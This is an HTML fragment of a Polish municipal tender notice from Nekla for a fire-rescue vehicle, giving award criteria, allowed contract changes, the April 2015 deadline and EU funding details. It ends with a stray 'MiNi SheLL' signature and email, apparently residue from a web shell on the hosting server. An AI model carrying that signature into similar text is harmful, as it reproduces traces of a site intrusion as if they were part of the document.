
<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Długość okresu gwarancji na pojazd - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wszelkie zmiany i uzupełnienia warunków umowy mogą być dokonywane za zgodą Stron, wyrażoną na piśmie w formie aneksu pod rygorem nieważności, o ile nie będzie to sprzeczne z ustawą Prawo zamówień publicznych.
2.Niedopuszczalna jest jednak, pod rygorem nieważności zmiana postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba, że Wykonawca przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub specyfikacji istotnych warunków zamówienia oraz określił warunki takiej zmiany.
3.Zmiana postanowień umowy zgodnie z zapisem art. 144 ust. 1 może dotyczyć:
a.możliwości zmiany (przedłużenia) terminu realizacji zamówienia, za pisemną zgodą Zamawiającego, w przypadku wystąpienia okoliczności, których Strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności,
b.zmiany w zakresie płatności - wynagrodzenia w przypadku ustawowej zmiany obowiązującej stawki VAT,
c.parametrów technicznych przedmiotu zamówienia - w przypadku gdy z przyczyn technicznych (w szczególności zakończenia produkcji lub niedostępności na rynku urządzenia zaoferowanego w ofercie) konieczne jest dokonanie zmiany np. rodzaju/modelu/typu, a parametry te będą nie gorsze niż parametry zaproponowanego w ofercie urządzenia,
d.możliwości dokonania zmiany Podwykonawców, w zakresie prac wskazanych w ofercie, w związku z rażącym naruszeniem przez nich warunków umowy oraz w związku ze zdarzeniami losowymi,
e.nieprzewidzianych okoliczności formalno-prawnych.
4.Wykonawca zobowiązuje się niezwłocznie poinformować Zamawiającego o zaistnieniu przesłanek stanowiących potrzebę zmiany umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://nekla.nowoczesnagmina.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Nekli
ul. Dworcowa 10
62-330 Nekla.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.04.2015 godzina 09:00, miejsce: Urząd Miasta i Gminy w Nekli - Sekretariat
ul. Dworcowa 10
62-330 Nekla.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany z Europejskiego Funduszu Rozwoju Regionalnego w ramach Wielkopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013 Wsparcie techniczne OSP w Gminie Nekla poprzez zakup samochodu ratowniczo-gaśniczego dla poprawy bezpieczeństwa środowiskowego i ekologicznego
Umowa nr UDA-RPWP.03.06.06-30-010/14-00.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com